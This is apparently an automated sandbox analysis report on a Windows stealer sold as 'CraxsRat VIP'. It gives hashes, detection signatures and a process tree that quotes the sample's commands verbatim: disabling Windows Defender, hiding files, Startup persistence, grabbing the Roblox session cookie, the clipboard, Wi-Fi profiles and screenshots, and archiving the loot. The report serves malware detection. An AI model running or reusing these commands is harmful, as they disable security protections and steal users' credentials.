Analysis

  • max time kernel
    143s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-06-2024 07:27

General

  • Target

    CraxsRat VIP/CraxsRat VIP/CraxsRat.exe

  • Size

    87.0MB

  • MD5

    d87d21db061026bd81a29b09a7674769

  • SHA1

    4a398ac89d70dcf511fd853839355105250ba7d5

  • SHA256

    6f6c5af7a14cf93d214f579d617abd5253821643e002562921945a8f2775bb06

  • SHA512

    9b3fef9e28b94bafac58f16a066c6e23eb7d877e95c33d77423d43f8692bab72fec433260a1dd36ee28800550f8ab1258ce727ebb3340257c96de36c35bd93b7

  • SSDEEP

    196608:H7umWewROjmFwDRxtYSHdK34kdai7bN3m2dFG:yD8K2pM9B3QsY

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe
    "C:\Users\Admin\AppData\Local\Temp\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3048
    • C:\Users\Admin\AppData\Local\Temp\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe
      "C:\Users\Admin\AppData\Local\Temp\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4388
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:944
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1748
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3684
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3876
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Fatal error ! ', 0, 'CraxsRat', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4100
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Fatal error ! ', 0, 'CraxsRat', 0+16);close()"
          4⤵
            PID:396
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:812
          • C:\Windows\system32\attrib.exe
            attrib +h +s "C:\Users\Admin\AppData\Local\Temp\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe"
            4⤵
            • Views/modifies file attributes
            PID:2332
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​ ‏‎.scr'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2936
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​ ‏‎.scr'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:860
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3856
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:632
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3008
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4928
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4692
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2624
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2828
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2856
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1980
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3620
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4244
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:4976
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2044
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              4⤵
                PID:4004
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "systeminfo"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2324
              • C:\Windows\system32\systeminfo.exe
                systeminfo
                4⤵
                • Gathers system information
                PID:452
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4300
              • C:\Windows\system32\reg.exe
                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                4⤵
                  PID:3336
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:5080
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1148
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\p5mf05ld\p5mf05ld.cmdline"
                    5⤵
                      PID:784
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6987.tmp" "c:\Users\Admin\AppData\Local\Temp\p5mf05ld\CSC570C4C7EE9D94507BBF8BC1E8864A0B5.TMP"
                        6⤵
                          PID:2624
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:3568
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:4412
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                        3⤵
                          PID:4896
                          • C:\Windows\system32\attrib.exe
                            attrib -r C:\Windows\System32\drivers\etc\hosts
                            4⤵
                            • Drops file in Drivers directory
                            • Views/modifies file attributes
                            PID:2312
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                          3⤵
                            PID:3952
                            • C:\Windows\system32\attrib.exe
                              attrib +r C:\Windows\System32\drivers\etc\hosts
                              4⤵
                              • Drops file in Drivers directory
                              • Views/modifies file attributes
                              PID:556
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:5096
                              • C:\Windows\System32\Conhost.exe
                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                4⤵
                                  PID:2044
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:3012
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  3⤵
                                    PID:4896
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      4⤵
                                        PID:4976
                                      • C:\Windows\system32\tasklist.exe
                                        tasklist /FO LIST
                                        4⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4528
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      3⤵
                                        PID:2400
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          4⤵
                                            PID:3928
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:4852
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:2284
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:2832
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:3924
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                  3⤵
                                                    PID:812
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                      4⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4612
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                    3⤵
                                                      PID:4352
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4596
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "getmac"
                                                      3⤵
                                                        PID:5092
                                                        • C:\Windows\system32\getmac.exe
                                                          getmac
                                                          4⤵
                                                            PID:1304
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI30482\rar.exe a -r -hp"5534" "C:\Users\Admin\AppData\Local\Temp\h53OR.zip" *"
                                                          3⤵
                                                            PID:2128
                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI30482\rar.exe
                                                              C:\Users\Admin\AppData\Local\Temp\_MEI30482\rar.exe a -r -hp"5534" "C:\Users\Admin\AppData\Local\Temp\h53OR.zip" *
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:1996
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                            3⤵
                                                              PID:864
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                4⤵
                                                                  PID:3568
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic os get Caption
                                                                  4⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4112
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                3⤵
                                                                  PID:704
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic computersystem get totalphysicalmemory
                                                                    4⤵
                                                                      PID:4180
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                    3⤵
                                                                      PID:3928
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic csproduct get uuid
                                                                        4⤵
                                                                          PID:1592
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                        3⤵
                                                                          PID:3212
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                            4⤵
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:1944
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                          3⤵
                                                                            PID:1820
                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                              wmic path win32_VideoController get name
                                                                              4⤵
                                                                              • Detects videocard installed
                                                                              PID:1836
                                                                          • C:\Windows\system32\cmd.exe
